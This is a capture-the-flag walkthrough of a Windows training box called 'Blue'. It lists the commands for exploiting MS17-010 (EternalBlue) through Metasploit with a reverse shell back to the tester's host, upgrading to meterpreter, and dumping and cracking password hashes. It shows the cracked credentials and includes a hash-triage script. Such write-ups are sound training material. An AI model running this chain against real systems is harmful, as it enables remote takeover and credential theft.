Name: Blue
Description: Deploy & hack into a Windows machine, leveraging common misconfiguration issues.
Target IP: 10.10.177.175
nmap -p1-1000 10.10.177.175 # quick sweep of the first 1000 TCP ports; 445 (SMB) is open
nmap -sV -p445 10.10.177.175 # service/version detection on SMB
nmap --script smb-vuln-ms17-010 -p445 10.10.177.175 # NSE check: host is vulnerable to MS17-010 (EternalBlue)
msfconsole -q
search ms17-010
use exploit/windows/smb/ms17_010_eternalblue
set payload windows/x64/shell/reverse_tcp
set RHOSTS 10.10.177.175
set LHOST 10.18.65.48
# LHOST = tun0 VPN interface IP
run
background # or CTRL+Z
- The payload used was windows/x64/shell/reverse_tcp, so the plain command shell must be converted into a meterpreter shell.
search shell_to_meterpreter
use post/multi/manage/shell_to_meterpreter
sessions # list sessions; the shell session from the exploit was session 2 on this run
set SESSION 2
run
sessions 5 # interact with the new meterpreter session (session 5 on this run; use whatever id sessions shows)
getuid
Server username: NT AUTHORITY\SYSTEM
ps
- Even though getuid reports SYSTEM, the session lives in the exploited process, which may not run as the SYSTEM user or may be unstable. Pick the PID (process ID) of a process owned by NT AUTHORITY\SYSTEM from the ps output and migrate into it before dumping hashes, e.g.
1284 - spoolsv.exe
migrate 1284
hashdump
Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Jon:1000:aad3b435b51404eeaad3b435b51404ee:ffb43f0de35be4d9917ac0cc8ad57f8d:::
Format of each line: <Username>:<User ID>:<LM hash>:<NT hash>:<Comment>:<Home Dir>:
aad3b435b51404eeaad3b435b51404ee is the LM hash for no password (Windows stores this value when LM hashing is disabled, as it is here, so the LM field is useless for cracking). 31d6cfe0d16ae931b73c59d7e0c089c0 is the NT hash of an empty password, so Administrator and Guest have no password set; only Jon's NT hash is worth cracking.
echo 'ffb43f0de35be4d9917ac0cc8ad57f8d' > jonhash.txt
john --format=nt --wordlist=/usr/share/wordlists/rockyou.txt jonhash.txt
ffb43f0de35be4d9917ac0cc8ad57f8d is the NTLM hash for alqfna22.
Jon's credentials are jon:alqfna22.
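The hashdump format and the cracking step above can be handled in one place. The following POSIX shell script is an added example, not part of the original write-up: it splits pwdump-style hashdump lines into the fields described above, drops accounts whose NT hash is the empty-password value, and writes the rest as user:hash lines that john --format=nt accepts. The sample input embeds the three lines returned on this box plus one constructed extra account named legacy (not from the target) so the LM branch has something to find; the function names and the file name nt_hashes.txt are the example's own choices.

```shell
#!/bin/sh
# Added example (not from the original write-up): triage Metasploit hashdump output.
# Each line is <user>:<RID>:<LM hash>:<NT hash>:::
set -u

EMPTY_LM="aad3b435b51404eeaad3b435b51404ee"   # LM hash of the empty string (LM disabled / no password)
EMPTY_NT="31d6cfe0d16ae931b73c59d7e0c089c0"   # NT hash of the empty string

# Constructed sample: the three lines hashdump returned on this box, plus one
# made-up "legacy" account (not from the target) that still stores a real LM hash.
HASHDUMP_SAMPLE='Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Jon:1000:aad3b435b51404eeaad3b435b51404ee:ffb43f0de35be4d9917ac0cc8ad57f8d:::
legacy:1001:e52cac67419a9a224a3b108f3fa6cb6d:8846f7eaee8fb117ad06bdd830b7586c:::'

# "user:nthash" for every account whose NT hash is not the empty-password hash,
# i.e. the lines actually worth feeding to john --format=nt.
nt_hashes_to_crack() {
  printf '%s\n' "$1" | awk -F: -v empty="$EMPTY_NT" '
    NF >= 4 && length($4) == 32 && tolower($4) != empty { print $1 ":" $4 }'
}

# Names of accounts whose NT hash is the empty-password hash (blank password).
empty_password_accounts() {
  printf '%s\n' "$1" | awk -F: -v empty="$EMPTY_NT" '
    NF >= 4 && tolower($4) == empty { print $1 }'
}

# "user:lmhash" for accounts that still store a real LM hash; LM is far weaker
# than NT, so these should be attacked first with john --format=lm.
lm_hashes_present() {
  printf '%s\n' "$1" | awk -F: -v empty="$EMPTY_LM" '
    NF >= 4 && length($3) == 32 && tolower($3) != empty { print $1 ":" $3 }'
}

# Usage: report the triage and write the crackable NT hashes to a file.
empty_password_accounts "$HASHDUMP_SAMPLE" | sed 's/^/blank password (empty NT hash): /'
lm_hashes_present "$HASHDUMP_SAMPLE"     | sed 's/^/LM hash still stored, crack with --format=lm: /'
nt_hashes_to_crack "$HASHDUMP_SAMPLE" > nt_hashes.txt
echo "wrote $(wc -l < nt_hashes.txt | tr -d ' ') NT hash(es) to nt_hashes.txt"
# john --format=nt --wordlist=/usr/share/wordlists/rockyou.txt nt_hashes.txt
```

Running john over nt_hashes.txt instead of a hand-copied hash avoids wasting wordlist passes on the two blank-password accounts, and the user:hash form keeps the cracked password attributable to Jon in john --show output.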
- In the meterpreter session, collect the three flags:
cd C:\\
dir
cat flag1.txt
cd C:/Windows/System32/config
cat flag2.txt
cd C:\\Users\\
dir
cd Jon
cd Documents
cat flag3.txt